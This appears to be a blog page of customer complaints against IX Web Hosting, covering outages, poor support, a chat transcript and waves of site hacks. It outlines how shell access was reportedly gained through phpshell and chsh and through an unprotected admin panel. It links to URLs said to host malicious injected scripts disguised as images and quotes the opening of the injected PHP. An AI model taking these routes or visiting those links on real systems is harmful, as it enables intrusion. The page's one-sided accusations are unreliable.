This site is hosted by IX Web Hosting and YES It has been hacked
Hahaha.. I know it is really not funny, but sometimes you just have to laugh… The above screenshot is from www.examinarse.com Seems like the owner packed his / her bag and left in a hurry..
While I’m here, I might as well post a few recent comments from HAPPY IX CUSTOMERS.
———————————————————————————————————————————
I hope Google ranks this website in their top search results for anyone wanting to know more about IXWebhosting. I had been with that webhost for more than 4 years and changed all my sites to a different host just last week. IXWebhosting is the most poorly managed, technically incompetent and frustrating company I have ever had the misfortune to deal with.
Why have I been with them for 4 years?
Their webhosting plans were at the time and still are pretty cheap when compared to other competitors. But its true, if you throw peanuts, you’ll get monkeys. You are ok till the time you have a website with only static (html pages). That’s what I had for 2 years. The moment you have a dynamic site, have anything to do with databases, use pages in asp or php… God save you. I’ve had nothing but trouble for the remaining 2 years pulling my hair out with every trouble ticket raised.Customer Service
Its the most slowest, incompetent buffoons I’ve ever interacted with. Every ticket raised takes a minimum of 14 hours to be verified. Their typical replies are “everything’s ok at their end”. They do not understand your query, nor can they understand any technical issues.Spam-
I lived with spam in each of our mailboxes for all the time I’ve ben with IXWebhosting. Spam is like its brother. Besides having issues with our mail disappearing from our mailboxes (their backup could only restore some of it as it was infrequently taken), I had to put up with tons of spam. At the time of writing this, I believe they have made the web access to the email accounts over https, but still, my experience with them was ghastly.Server Security-
My websites were hacked many a times. Their servers are easily vulnerable to anybody. I will rate my expertise with networks and security at advanced. To test the security I have hacked into my own hosting webserver and seen the list of domains, their entire contents by simply installing a ridiculous script. I raised this issue in a trouble ticket and the response was.. you guessed it..”everything’s ok at their end”Their famed easy to use preloaded scripts (Easy Apps collection)-
It is user friendly to install, I’ll agree. But every one of them is completely outdated, buggy to customize and of course vulnerable to hacks. Their excuse- Its the entire collection of scripts that they install when they update the server software (maybe years before). The scripts in them cannot be changed or upgraded.Final Comments-
If you have a simple website with a couple of html pages and you don’t mind spam, if your wesite is hacked or defaced, its good value for cheap hosting.
Otherwise, Avoid Them Like The Plague… as someone else wrote in here.I am not affiliated with anyone or anything from anywhere and all the experiences above are my own.
Archie H=====================================================================
We have been using IX for a long time. First thing that happended was that they allowed my EX-Wife access to my account after we were divorced because she has paid by her credit card at one point for one domain name. They changed the admin panel and allowed her full access to everything because she did not pay for her domain and called them! MORORNS! We have a pro business account and they allowed her access to customers account info, OMG what a night mare! Finally after getting the police involved they fixed it. Now 3 out of 7 of our accounts have been hacked… We have not done or changed anything, in fact the accounts that have been hacked are just place holders for domanins… I have asked it to be fixed from backup 4 times so far and as of yet nothing… I am just in the process of moveing everything to a new local box and say GOOD BYE loosers!
Michael===================================================================
Server vulnerable to hacking, infected our site, IX Web Hosting refused to acknowledge or address, arbitrarily shut us down. Luckily, we had just completed set up with an alternative server and this didn’t cost us the significant downtime, money and trouble it could have. AVOID them like the plague!
Dayl====================================================================
In the beginning (up to a year ago) everything was fine. Now I have had so many problems that today I have changed my hosting company and left ix-webhosting and went to BlueHost.
My problems:
1. extremely slow server response (average response to a simple html page over 5 seconds). Regularly browser says: no server response. My customers are complaining. Maintaining my blog is almost impossible
2. ftp regularly does not work (complaint by server: too many clients, but I have just one ftp connection open)
3. average response time of trouble ticket about 24 hrs
4. tremendous problems in upgrading from php4 to php5 (I had to change ix-webhosting servers), without any help from them. They offered me help but that would cost me over 200$
5. their mysql server is slowWhen I complain to them they tell me these problems are temporary and that they are about to improve it all.
Ad=================================================================
Once again I have had a horrible experience with IX WebHosting. Here is a list of issues that I exprienced over the last year of being with them:
1. The password to the control panel keeps getting reset and I know for a fact that only a select few have access. Any changes made by those few are logged and disseminated to the rest. When I ask I am made to look like “what’s the big deal?”
2. They NEVER return calls and almost never update tickets except to close it and say that it was your fault. They refer you to the “system admin” who is a ghost as far as I am concerned then are quick to tell you that they can’t do anything else to help you.
3. Press as you might the cannot suggest when the problem can be fixed. It is like they think that your business and clients that are affected by problems don’t matter.
4. Their first level support are unskillful googlers who waste no time in presenting irrelevant rubbish explanations that clearly shows that they have missed the basics of training.
Most Recent Exerience:
Unfortunately they host my mail (haven’t gotten around to hosting my own as yet). One of my customers suddenly cannot send me any mail from their domain, at least I no longer receive it on my domain hosted with IX Webhosting.
My customer had a recent SPAM issue that was resolved however they were not blacklisted. All this time I was receiving mail fine. However a while after the issues is resolved I cannot receive any mail from them.
I try chat support who quickly tells me that I need to call in to report the problem.
ok I call and some guy is trying desparately to convince me that there is a problem with the MX records of my client. And even though I tell him that mxtoolbox gives me a clean report and also that my hosted mail is the only domain that is not receiving mail from my client along with other information he refuses listen. Eventually he gets tired and tells me that he has to get a system admin to call me back.
24 hrs later no call from any admin and I decide to log a ticket myself and describe the problem – no response.
I call back again and a young lady informs me that the issue was left untouched, whatever that means and puts me on hold after every question I answer. She then routes it to the “correct” queue and pomises me that I will receive a call.
24 hrs later no call and no update other than hers that says the call is on hold.
I update the ticket to ask what is going on?
12 hrs later no response so I call and was informed that since I updated the ticket to ask a question it was reverted to the end of the queue. Apparently I was punished for quering the status on my issue….
Another young lady can give me no indication as to an estimated resoution time or at least response time.
I ask for her supervisor who refused to give me his name but was quick to tell me that I would have to wait until the admins got around to looking at the problem.
He didn’t think it was reasonable for them to at least update the ticket and was quick to tell me that “we are just the phones” and that they couldn’t escalate beyond redirecting my problem to the admin queue. They would get to it whenever they can and I would have to wait…”there are other customers ya know?” so I have absolutely no idea how long I will be in that queue. His entire tone suggested that he had worked a tripple shift and was tired and grumpy or he simply couldn’t be bothered. Meanwhile I embarasingly have to tell my customer that I am in the process of moving my mail services which after this I definitely will.
It really upsets me when companies like this get away with such horrible service.
The least you owe your customer as a service provider is a timely and honest update(s) especially when there is a problem. Lack of communications leaves people to assume the worst and suggests that the customer is not important. It does not matter where the fault lies – you are providing a service and it should be your obligation to protect the reputaion of that service by open communications to the client at all times. As an IT consultant I can personally attribute the retension of my business not to my knowledge as much as to ensuring that my customers are always informed and have open access to me. Many times it has been my saving grace during the few hiccups I have made over the years.
Anson=================================================================
Ordered web hosting form them on Thurs. pm, finally setup on Fri. However, could not upload web since FP extensions were not installed; I installed them from the panel. Long story, several calls to tech support, they can not get the FT issues resolved; moved up to admin. Called over the weekend and told it would be 24 hours…I had to wait in the queue. On Monday afternoon I was told give them another 4 -5 hours. I cancelled later that night about 10 pm…issue not resolved. Tech support was useless. They did offer 2 months extra time if I stayed. After 30 days I would have los the $$; they did refund my $$. I had used them for a couple years in the past without too many issues, site did go down several times. Not recommended.
Rick===================================================================
And the list goes on and on and on, but that makes good posting for another time.
REAL ix web hosting customer reviews NOT paid and misleading reviews
EVERYONE knows that IX web hosting pays for high listings and “Praise Reviews’ [ read article HERE ] and their ” Affiliate Army ” is told to SPAM boards trying to lure people to use IX Web Hosting. Do not be fooled by the low prices and Unlimited Everything, Do NOT become a statistic, because like 1000’s before you, you WILL regret it.
Just see for yourself what REAL Customers that have NOT been paid to post positive comments about IX have to say:
http://www.webhostingreviews.com/ix-web-hosting-reviews.htm
AND
http://www.webhostingstuff.com/review/IXWebHosting.html
AND Another one
http://www.web-hosting-top.com/web-hosting/web-hosting-top.ixwebhosting.com-reviews
You will start noticing “Positive” reviews being posted by the Paid Affiliate Army.. but they always stand out as being Fake.
Numerous sites on IX servers NS3 and NS4 INFECTED
During the last 4 days Numerous People are reporting their sites are infected, and customers are being re-directed to a Russian site.
So far ALL the sites reported are hosted on NS3.IXWEBHOSTING.COM and NS4.IXWEBHOSTING.COM.
If your site is hosted on these servers, OR possibly other servers, you should check your website, by using a SEARCH ENGINE. DO NOT go directly to your site through your search bar OR shortcut, but use a Search Engine. The results are being re-directed. It will also be a matter of time before these sites will be “Blacklisted” by Google and other search Engines.
Feel Free to contact IX Web Hosting about this matter, but they will only blame you for their issues, and lack of knowing how to treat their customers with respect.
Please send us a message if your site has been comprimised.
IX Web Hosting, .htaccess Redirect, SQL Injection and Banned by Google
This week has been a complete disaster for 1000’s of IX Web Hosting’s customers.
A new wave of the .htaccess injection is affecting 1000’s of sites, but things just get worse and worse, Google is flagging sites hosted by IX Web Hosting because of the sites being redirected to infected sites.
Some customers sites are even getting “Splashed” by Google with “‘Reported Attack Site’ ” can you imagine spending YEARS building up a reputation and then having your site and your reputation Destroyed because of a hosting company that after 10 MONTHS!! still cannot and has not fixed this security issue…
10 MONTHS!!! IX WEB HOSTING… You should be ASHAMED!!
Here is an example of someone who has spent YEARS working hard to build a (basic) website and a reputation, and all was lost…
This is the third time I’ve requested review and had it result in a continuation of the ban. I’m a simple artist trying to make a living while going to school. My reputation is being destroyed by this, as well as my art. I’m not a programmer but I know my html that I wrote for my site, and it’s ridiculously simple. All the 3 pages, even though it was said there where 5 pages, that were listed in webmaster tools were the same exact html files I wrote. These were:
http://www.****art.com/ADAbout.html
http://www.****art.com/ADBreedKirin.html
http://www.****art.com/Itemhtml/directions.html { Links killed by neverix}I’ve downloaded and looked at the code of each of these, finding nothing wrong with them.
I also have called my Host, IXwebhosting, who crawled through my site and looked at my files. They said they couldn’t find anything either and that there seemed to be nothing wrong. They also said the ‘Reported Attack Site’ html page google slapped on top of my index wasn’t showing up for them. I had posted once on this forum before with the question: ‘WHERE is the malicious code showing up,’ and I was told how to submit a review. Google is ruining my reputation, my site, my client base, and wasting my precious time. I don’t know what to do anymore, because nothing I have done seems to have worked. I re-uploaded my site, changed permissions to 444, removed any kind of php and unnecessary files, changed my two user passwords to more secure ones, and everything else I’ve mentioned in the above text. I don’t know what else to do. I’ve spent years establishing that site and it’s reputation…years now wasted and ruined. Please someone help me.I hereby invite IX WEB HOSTING to send me their side of the story about this issue, I will post it on this blog for everyone to read… It’s only fair to hear both sides of the story.
And NO, this is not just a “One Off” see 1000’s more : http://www.google.com/search?hl=en&safe=off&q=%27Reported+Attack+Site%27+ix+web&start=0&sa=N
EASY Access to IX Web hostings Server ROOT
From a Unhappy IX customer
I was beginning to think I was crazy. My site would get hacked and I would change the password. This would keep happening over and over. Yet every time I would call in they would say it was my fault. Well today I discovered that once again my site had been hacked as well as all the other domains in my userid for them. While going through one of my sub domains I found a hackers control panel which I downloaded and took a screen shot. I even looked around in it. I realized quite quickly that I had server root access and I could see other peoples files like I was on a regular computer. This control panel seems to have it all. Anyway here is a screen shot for all you who wonder what is going on:
I have marked my info out to spare me as well as the folder I was browsing. But this control panel seems to have any exploits you want on it with very little effort. It even has a handy self kill button which I used. Of course I am sure they will be back and hack right back in. Meanwhile I have to look into another host.
CLICK ON IMAGE FOR LARGER PREVIEW
IX Web Hosting offers 100% 30 day Money Back Guarantee
First of all, lets break this down for the wise folks at ix web hosting that follow these rantings..
100% ….. 30 day(s) …. Money Back ….. Guarantee
Sounds good, but is this really true??.. or are the small letters hidden in some dark corner.. Well we found someone that gave it a try, and here is the story…..
PACKAGE : Business package incl. 2 FREE domain names
PRICE PAID: With their end-of-year special, I even got a special price ($17.27 for three months, with a year agreement) and paid $95.40 via credit card for a year’s worth of service.
CANCELLED : on day 30 ( the last day)
( needed for 100% refund) REASON OF CANCELLATION : I was blindly suckered in by your outrageous claims regarding the quality of your service. In the last two weeks I have experienced no less than *THREE* outages due to database issues. I’m going back — no, *RUNNING* back — to a former provider. They provide better service, and at a better price to boot. Please terminate this account immediately. Monetarily, rape me for whatever your contract allows — I don’t care. At this point, I’d just about pay you to be done with you. Good riddance. [name witheld]
So, they refunded you the full $95.40??
hahahahahaahaa!!!
As mentioned above, IX Web Hosting’s package came with two “FREE” domains, which I promptly registered. They were stupid domain names that I’ll probably never use, but hey, they were “FREE”, right? Uh, no. Of the $95.40 I paid to IX Web Hosting, they credited me :
- $57.45 “for unused but prepaid period of Business Plus”
- charged me $18.21 for the first domain
- charged me $18.21 for the second domain
-
refunded me a grand total of $21.03
WHAT!!!! $21.03!! … but that is just 22% of $95.40
Now that is what we call DECEIVING YOUR CUSTOMERS!!!
Helping IX Web hosting secure their servers.
Now we ALL know how rude, stuckup, obnoxious and un-caring the majority ( not all, some deserve respect) of IX Web Hosting’s Support are, so the following REAL LIFE examples will not come as a surprise to most of you.
These 2 examples were reported to IX Web Hosting in Jan. 2008, 3 months BEFORE the May disaster that led to 10’s of servers being seeded, and up to 200,000 sites infected… Now let me be clear, that these examples are probably not related to what happened, but the OBNOXIOUS mentality of IX Web Hosting definitely has!!…
Please note, that these issues have now been fixed ( otherwise I would not post them here)
ISSUE 1 :
” – Using phpshell and runing the chsh program on server side
the users are able to change their default shell from /bin/nologin to any other shell and get
access to the IX servers by ssh.
I hope my effort to inform you about the flaw will you not understand as a malicious activity. ”
IX’s RESPONSE :
” – Although pointing out that minor security flaw wasn’t viewed as malicious activity, please understand that any other attempts to hack into our system will be viewed as such, and it will be treated according to our policies. ”
?? !! What not even a Thank You!!??… Nope.. wayyyyy to obnoxious for a Thank You!!
ISSUE 2 :
The default installation of IX’s “click and install” E-commerce software allows read and write rights to users directory to anyone on the internet. You probably have lot of affected users..
( No state of the art hacking needed. There is a nice php admin interface without password. OK, I know what is in your mind: You will notice at the first login that nobody asked your admin password. The trap is that the admin interface is linked only in to the cPanel and when you access it you have the feeling that the password authentication is missing because the authentication is derived from your cPanel access (as in many other applications and settings in cPanel). After all, a hacker can easily upload a malicious php file and execute some nice exec() calls affecting the rest of your domains hosted by IX webhosting.)
IX’s Response : ( you’re gonna luv this one!!)
“If you don’t like it, don’t use our Easy Install products.”
Ooooohhh Yes, it is good to be appreciated!!
Credits to ZolTan for the info
Thousands of IX Hosted sites offline for +35 HOURS!!
One of IX Web Hosting’s EXTREMELY OVERLOADED Server crashed a few days ago, leaving thousands of customers sites offline for …… more than 35 HOURS!!… Not minutes, HOURS!!.
When we contacted Support, we were told ( lied to) that the server was down for maintenance, and to be patient (hahaha) things would be up and running within an hour!!.. after the SEVENTH phonecall (28 hours later) we were finally told that the server was fried and backups needed to be transfered to the new server..
AGAIN another example of how IX Web Hosting LIES to their customers as for long as they can get away with it.. When they have been rumbled, and have their backs to the wall, only then do they admit to the truth!!
This is going to be pretty tricky for IX Web Hosting to keep to their 99.99% uptime guarantee
:: EDIT May 25th ::
We just recieved information from an insider at IX Web Hosting, that for months they had KNOWN issues with the server that fried… but the issues were ignored.
Just goes to show how much they care..
IX Web Hosting, Script Injection and banned by Google 2
So many people being banned by Google, and cannot find the source of the Injection..
I have previously posted on this blog WHY you cannot find the code.. Because the code is NOT on your page. The code is, and can be anywhere on the server ( I have posted 3 links to the code that was hidden as a .jpg) The code added to your site is actually an Iframe, so what you should be looking for is a small snippet of code that calls the script. ( check your Config, Header, Footer, Index.php etc.. ALL pages that get called on every page
Yesterday someone contacted me with this issue, and that person was also banned by Google, and had spent weeks trying to solve this problem.. They finally found the code in the CONFIG File . ( thanks to this blog)
The site is now clean, but it will only be a matter of days before it is injected AGAIN!!
Here is the post I posted in December last year:
Hundreds of IX customers, are contacting me to ask about the Injected script ( posted in a previous post) they are asking me HOW to remove it, because they cannot find it…
The Reason they cannot find it??
Because of a MASSIVE SECURITY ISSUE on IX WEB HOSTING’s SERVERS!!.. the script is NOT actually put onto any of your pages, the script is actually hidded somewhere on the server..
So far I have found 5 “seeds” .. These are the codes that are appearing in over 100,000 sites
( These have now been removed by ix web hosting but as you can see, the actual file is well hidden and disguised as an image. REMEMBER, this is where the files were stored that YOU can see on YOUR pages )
- http://on3photo.com/onlinestore/photos/106-firefighter_foto/1147-gustav_deployment/di_img_0002.jpg
- http://adventuresinstorytelling.com/modlogan/m_usage_200603_001_008.html
Remember to view the “source code” in the above links.
Very interesting is the second “seed” that is actually in an IX standard “modlogan” folder, that is standard a chmod 700 .
Secondly it should not be possible on any shared server to inject this script onto EVERY file on that server. The fact that this is happening means that IX web Hosting has not got a clue how to protect their servers, and customer web sites.
So as you can see, this script IS NOT actually put into your script, that is why you cannot find it.. HOWEVER, somewhere on your site, there is a bit of code ”Calling” this script, and that appears in your pages.
Check ALL the pages that get called for every page, ie. header, footer, index, config, sidebar etc.So far I have evidence and proven that the following IX servers running the following Database’s are seeded:
- mysql33.ixwebhosting.com
- mysql15.ixwebhosting.com
- mysql27.ixwebhosting.com
If you know of any others that are seeded, please let me know.
Hope this helps
:: Some people have contacted me to tell me that the Injected Script is ( also ) injected into the database, and in some cases a new table is created.
I have checked 9 databases of infected sites, and I have not yet come across the script in my Database’s, so I think that this might be “script” related, maybe that some scripts such as PhpBB2 allows for this to happen, so I recommend searching your Database for the script as well ::=================================================================
This issue has now been going on for more than 10 months…. 1 year this May.. Will IX Web Hosting be celebrating this milestone?
IX Web Hosting’s Reviews Feb. 2009
IX Web Hosting changes ALL FTP Passwords without warning.
During the past 2 days I have been bombarded with unhappy IX Web Hosting customers that can no longer update / change their files because IX Web Hosting changed ALL FTP Passwords without warning.
Here is one Email I recieved today.
Dear ******,
We would like to inform you of the new security updates we are making at IX Web Hosting. In our ongoing efforts to maintain security, we have dedicated our system administration team to investigating all possible vulnerabilities. One of the necessary updates we are making to enhance security is to change all FTP passwords. This will ensure that all of the protective measures we have and will be taking remain impervious to outside influence – this includes any security compromises that exist on the Internet that may negatively affect your account.
If you experience any problems logging in to your account via FTP, please take a look at the following information to regain FTP access.
You can visit http://www.ixwebhosting.com/index.php/pages.manual14 for an in-depth tutorial with screenshots on how to update your FTP password, or you can follow the simple steps below.
- Visit https://manage.ixwebhosting.com and login.
- Look for the section called “Hosting Products” and click on the Manage button for your hosting account.
- Look for an icon called “FTP Manager” and click on it. In this area, you will find an icon that resembles a pencil and paper. Click on it to change your FTP password. Please note: to ensure the security of your website, you should not use the same password as your previous password.
It is always recommended that you choose a strong password. We have provided you with a website which will help evaluate the strength of the password you choose:
http://www.microsoft.com/protect/yourself/password/checker.mspxWe are in the process of performing several upgrades to strengthen security. As new developments are made on the server-side and in regards to your FTP account, we will be sure to keep you informed!
We would like to sincerely thank you for your understanding and also, of course, for hosting with us. If you have any questions about this topic, please contact us via ticket, live chat or our 24/7 phone support. We are here for you 24/7 and would be happy to address any concerns you might have!
Thanks again,
Sammie Taunton
Director of Customer Relations
www.ixwebhosting.com————–
I thought it was a scam because all the links pointed to “rs6.net“, so I just ignored it for a while.
Later in the evening, I was going to forward the email to IXWebhosting, but on a lark decided to check out rs6.net, and found out it was a mass email company. It then occurred to me that IX might have used them, so I started digging into my sites.
I did indeed find that they had hosed ALL of my FTP passwords. This is not a big deal if you are just uploading static HTML pages with pictures of your puppies, but I have 16 sites on a PHP CMS I wrote myself. Since every site has at least one unique FTP password, and they are scattered here and there (trying to be somewhat unspecific on purpose
) it’s going to take a while to change all this.
I tried to call IX, but of course the wait was an hour, so to amuse myself I started a chat session with “customer support”. Yes, those quotes are there for a reason. I realize this may not place me in the best light, but I was REALLY ticked off. Here’s the transcript of the chat…
—————————————————————————-
Chat InformationPlease wait for a site operator to respond.
Chat InformationYou are now chatting with ‘Kirill Skripka’
Kirill Skripka: Hello, my name is Kirill. How can I help you today?
you: I got a VERY strange email today about changing my FTP passwords – I think it’s a scam – have you seen it yet, or do you know anything about it?
Kirill Skripka: That is e-mail from us. Please change your password for the FTP from your Control panel->FTP manager->Password
Kirill Skripka: All password were changed, due to ProFtpd upgrade on the server side
Kirill Skripka: Please change your FTP password and try to connect to your site via FTP again
you: Are you guys out of your minds????? How about a little notice???? I have a lot of programming changes to make for several sites!!!!!!
you: Why isn’t there anything about this on the Control Panel?
Kirill Skripka: We have send notification e-mail to all costumers
you: No, you sent notification that you had DONE it, not that you were GOING to do it
Kirill Skripka: yes, that was notification. If we sent e-mail before changing password then could be misunderstanding about when exactly we will change it and other. Also we could not check if you have read our pre-notification and only then start to change passwords
Kirill Skripka: We are honestly apologize for inconveniences caused to you
you: Do you have any REAL programmers there???? I have like 16 sites I have to change RIGHT NOW. What is WRONG with you people????????
you: You have to be out of your freaking mind if you think this is good customer service!!!!!!!
you: I’m on hold on the phone line – I’ll be speaking to a supervisor. I figure I’ll be on hold for about 90 mins. at the rate it’s going.
you: And by the way – the email LOOKS like a scam. I’m not even sure I’m really talking to IXWebhosting here.
Kirill Skripka: We are sorry again, but that was necessary move to change FTP passwords
you: Actually, no, it wasn’t. You could have let us know this was GOING to happen. I’m gonna have a bunch of VERY pissed off customers. Not unlike the way I’m pissed off with IXWebhosting right now.
you: Is there anything on the site about this?
Kirill Skripka: there should not be anything on the site. It is not non-costumers business that we have something change to our costumers. They are not allow to see that info just view our site. We have sent e-mail.
you: That’s a bunch of crap and you know it. Or you should.
you: This is completely unacceptable. I’m going to be up half the night trying to fix this.
you: Explain to me again as best you can why this had no notice.
you: Did it not occur to anyone that there might be programming issues on sites to deal with????
you: As for non-customer business – I can understand that – BUT THE EMAIL LOOKS LIKE A SCAM
Kirill Skripka: We did notice you. E-mail is the best way to do it. Pre-information will not be fine.
you: Look, child, do you have any programming experience?
you: Have you ever dealt with anything like this?
you: Do you have a supervisor there with any experience?
you: Actually, in one regard you are correct – email is the best way to contact us – but an email pointing to a page visible to us AFTER we sign in, and with a notice that “in 48 hours (or whatever) we will be upgrading…blah, blah, blah…”
you: Honestly, this is BUSH league. I will be copying this chat exchange and putting it onto a blog for other people to see.
you: People need to know what kind of stuff IXWebhosting pulls
Kirill Skripka: I want to inform you of the new security updates we are making at IX Web Hosting. In our ongoing efforts to maintain security, we have dedicated our system administration team to investigating all possible vulnerabilities. One of the necessary updates we made to enhance security was to *change all FTP passwords*. This will ensure that all of the protective measures we have and will be taking remain impervious to outside influence – this includes any security compromises that exist on the Internet that may negatively affect your account. We are in the process of performing several upgrades to strengthen security. As new developments are made on the server-side and in regards to your FTP account, we will be sure to keep you informed!
you: Yes, thank you, I read it the first time. It doesn’t make any more sense now than it did when I first read it. The problem is THERE WAS NO NOTICE. I have to go SITE BY SITE and see if there is anything I have to change. My hope is the existing passwords are all still working.
you: Honestly – do you think I had nothing better to do tonight than change all my sites. WHAT WERE YOU THINKING!!!!!???? WERE YOU THINKING??????
you: Is there a supervisor available?
Kirill Skripka: Please note, that changing FTP password do not affect your site work [NOTE: I LOVED this line! >.<]
Kirill Skripka: but you should change it to be able upload your files with FTP connection
you: You are REALLY stupid. Excuse me, but you are. THE FTP passwords are in the programs that my customers use to upload files.
you: They are embedded in the programs I wrote.
you: DO YOU HAVE A SUPERVISOR?????
Kirill Skripka: Yes, we have
you: THEN PLEASE PUT THE SUPERVISOR ON
Kirill Skripka: hold on please, let me transfer you to my supervisor
you: Thank you
Chat InformationPlease wait while I transfer the chat to ‘Yuliya Gordeeva’.
Chat InformationYou are now chatting with ‘Yuliya Gordeeva’
Yuliya Gordeeva: Hello, my name is Yuliya.
you: First, Yuliya – are you Kirill’s supervisor?
Yuliya Gordeeva: Let me read your conversation with Kirill
Yuliya Gordeeva: yes, I am
you: While you’re reading – I realize you probably can’t do anything about any of this – but I’m REALLY pissed off. This is completely unacceptable – both the way the change was handled and the idiot advice from Kirill
Yuliya Gordeeva: Please accept my apologies for some misunderstanding in the previous conversation
Yuliya Gordeeva: Let me draw your attention to that fact that our system administrators are investigating the problem related to the security of our servers in order to help customers protect their websites from any hack attempts. That is why changing all FTP password was an urgent action. Please accept my apologies that we have not informed you about such actions.
you: Yes, you sent me an email telling me you had already done it, not that you were going to do it. ALL MY SITES ARE BROKEN – EVERY LAST ONE. Well, I take that back, I’ve checked about four of them, but I’m certain they are all hosed
you: This is not in the presentation of the site to the public, but rather in the administration of the site by my clients.
Yuliya Gordeeva: As you already know we are in process of updating Apache on all
Yuliya Gordeeva: servers from 1.3.1 to 1.3.36, ProFTPd from 1.3.1 to 1.3.2
you: Again – if I’d had some notice, I could have made this a relatively transparent change.
you: Sorry, no, didn’t know that – no one notified me
you: It’s not that big a deal to me – I like upgrades, as a rule, but I needed some notice.
Yuliya Gordeeva: I’m sorry, but all your websites are not broken due to that fact that we have changed only your FTP password. Please understand that if such changes have not made all the websites can be hacked or affected by any malware
you: Since this one BROKE my passwords, it has a larger than normal effect
Yuliya Gordeeva: So all the actions were turned to increase the security of your websites
you: Excuse me, but as a matter of fact they ARE broken. I just tried several of them – not on the front end, but on the site administration for MY clients – through the PHP CMS I wrote
Yuliya Gordeeva: Please understand that you need to change only your FTP password and then use your new password to access your FTP
you: Again, I appreciate upgrading the security, but you made a false assumption that changing those passwords had a very small effect
Yuliya Gordeeva: Kindly please give it a tty
you: I’m number two on the telephone cue – I’ll see if someone there has more understanding of this. Have you ever tried programming FTP functions in PHP?
Yuliya Gordeeva: Please be sure that changing FTP password is not the only one change we made
you: It is relatively simple, but I have a lot of places to change it.
you: Thanks – I’m aware of that, and I really do appreciate the upgrade – I REALLY DO! But since they changed my passwords without any notice, I’m in a bit of a bind for time to fix it.
Yuliya Gordeeva: Please note that some widespread trojans have a functions to steal FTP passwords from user`s local PC`s and send these passwords to hackers (or special bots which were made by hackers). So please imagine that some of the password were stolen before we made such changes
Yuliya Gordeeva: and how many websites will be hacked if passwords are still the same
you: Yes, I know. It’s a very old problem. One I’m not sure we’ll ever beat as a computing community.
you: It’s not like I have a choice here, is it?
Yuliya Gordeeva: I’m really sorry that we made a couple problems for you by these changes but I hope that all that we are doing right now will save you and your websites from any hacking alerts
you: Gosh, thanks so much. Actually, it’s about 16-20 passwords, and 16-20+ scripts to change them in.
you: They were all random characters already.
Yuliya Gordeeva: I would like to assure you that we are trying to provide the best services including web service and fast technical support. We are working hard to prevent any issues from happening and doing our best in order to advance the level of services provided.
Yuliya Gordeeva: Yes, I really understand you
you: Yes, thanks. You’ve been so helpful.
Yuliya Gordeeva: You are always welcome!
you: I’ll talk to the phone support and let them know how REALLY UNHAPPY I am.
Yuliya Gordeeva: Again we deeply apologize for all inconveniences you have faced with our services and would like to say that we are more than thankful for your great patience and understanding. We will do our best to satisfy you as our customer and provide an upper-scale support and services to you.
Yuliya Gordeeva: I’m sorry, but there is really no way to restore previous passwords
Yuliya Gordeeva: So kindly please change it to the new ones
you: I’ll get right on that…
Yuliya Gordeeva: ok, that’s great. Thank you very much!
————–
(sigh) I then talked to someone with a little better command of the English language on phone support, and he said something to the effect that he’d come on at 10:30 PM and when he heard what they had done he knew it was going to be a bad night.
Well, I’m looking for a new host. Please feel free to post any of this you would like.
Tip from a reader “How to clean the Yahoo Counter Injection Script”
Hey buddy,
nice website, i wish i had seen it before I renewed my contract with the crooks at IX for 2 more years…
well, i am writing because i couldn`t find on your website a solution to clean the infections automatically. so maybe you want to post a solution:here is what I did:
1 – download the entire site
2 – Open an infected file with Adobe Dreamweaver
3 – Look for the infected code, select all of it and copy it to the clipboard (starts with “<?php if(!function_exists(‘tmp_lkojfghx’))…”). You must copy ALL the code!
4 – Still on dreamweaver, click on EDIT>FIND AND REPLACE
5 – on the FIND box you paste the infected code
6 – On the FIND IN dropdown select FOLDER and point it to the folder where your website was downloaded.
7 – click on REPLACE ALL (dreamweaver will replace the code with whatever is on the REPLACE box, as we didn’t write anything there, it will clean the code)I found out that all the infected files on my sites had exactly the same code, so it was quite fast to remove them.
Ivan
Thanks Ivan for your feedback, I hope this helps others, also sorry to hear your sites are still constantly being injected. It’s clear that IX Web Hosting still has not got a clue how to solve this issue, and on top of this they are having 3 other mayor issues to deal with.
IX Web Hosting has SERIOUS database Issues and lots more
In the past months, 1000’s of IX Web Hosting’s customers finally turned their back on the “Cheap, Unreliable and Insecure ” Web Host. This was due to the fact that more than 140,000 sites were hacked and injected on a WEEKLY bases, things got so bad that even the “Backups” were infected and deemed useless.
From May 2008 onwards IX Web Hosting continueously blamed their customers, mayor search engines, WordPress, Joomla, and every script on the market, actually, it was everyone’s fault, except IX Web Hosting.
The past 4 weeks I have recieved and seen an alarming amount of customers furious about the “Downtime” of their sites.
Downtimes of 6+ hours is normal…
I am curious who IX WEB HOSTING is going to blame this time
| Shira, 12th 2009f February, 2009 | ||||||||||||||||||||||
We’ve spent the last week uploading and creating database on our new IXWebhosting account. BIG MISTAKE. All of the database sites give random server connection errors more often than not and the server service in general is extremely unreliable. The online “Tech support” chat is a complete joke. Not once have they been able to resolve the problems we’ve communicated, and we have to chat them about 5 times a day. We’re closing our account today before serious damage is done.
|
Top 10 Search Terms Feb 8 and 9
A list of the top 10 Searches of people landing on this blog. This is what people are searching.
Today
ixwebhosting Reviews
ixwebhosting htaccess
ixwebhosting hacked
ixwebhosting injection .htaccess
ix webhosting hack
rip off hosting account
ixwebhosting cannot connect to database
ix web hosting htaccess deleted
ixwebhosting php issue
how is my site getting hacked? ixwebhost
Yesterday
ixwebhosting hacked
ixwebhosting
my php file infected contains iframe cou
infected website with directed wedsites
fake yahoo counter
ixwebhost php wordpress problems?
ix webhosting reviews
ixwebhosting injection .htaccess
ix webhosting injection
ix web hosting virus issue
Daily Top 10 Searches to this blog
As of today I am going to post the TOP 10 Search Engine Terms people use to find this site.
As you will see, there are a lot of issues going on.
Search Engine Terms
These are terms people used to find this blog.
Todays Search
- ix hacked
- ixwebhosting virus
- ixwebhosting hacked
- ixwebhosting
- ix webhosting hacked 2008
- http://ixwebhostwarning.wordpress.com/
- ix web hosting has been hacked
- http://ixwebhostwarning.wordpress.com
- ix webhosting htaccess
- ixwebhosting .htaccess hack
Yesterdays Search
- ixwebhosting hacked
- ixwebhosting malware
- ixwebhosting malicious
- fix ixwebhosting .htaccess
- modlogan hacked
- htaccess exploit passwords ixwebhosting
- ixwebhosting exploited
- how to remove yahoo counter injection fr
- access htaccess ixwebhosting
- ixwebhosting hack
Join forces to SUE IX Web Hosting
[ from an ix webhosting customer ]
Anyone interested in joining forces to sue ixwebhosting.com due to their bad, insecure servers and not providing what they promise, please contact us at elawcase@gmail.com
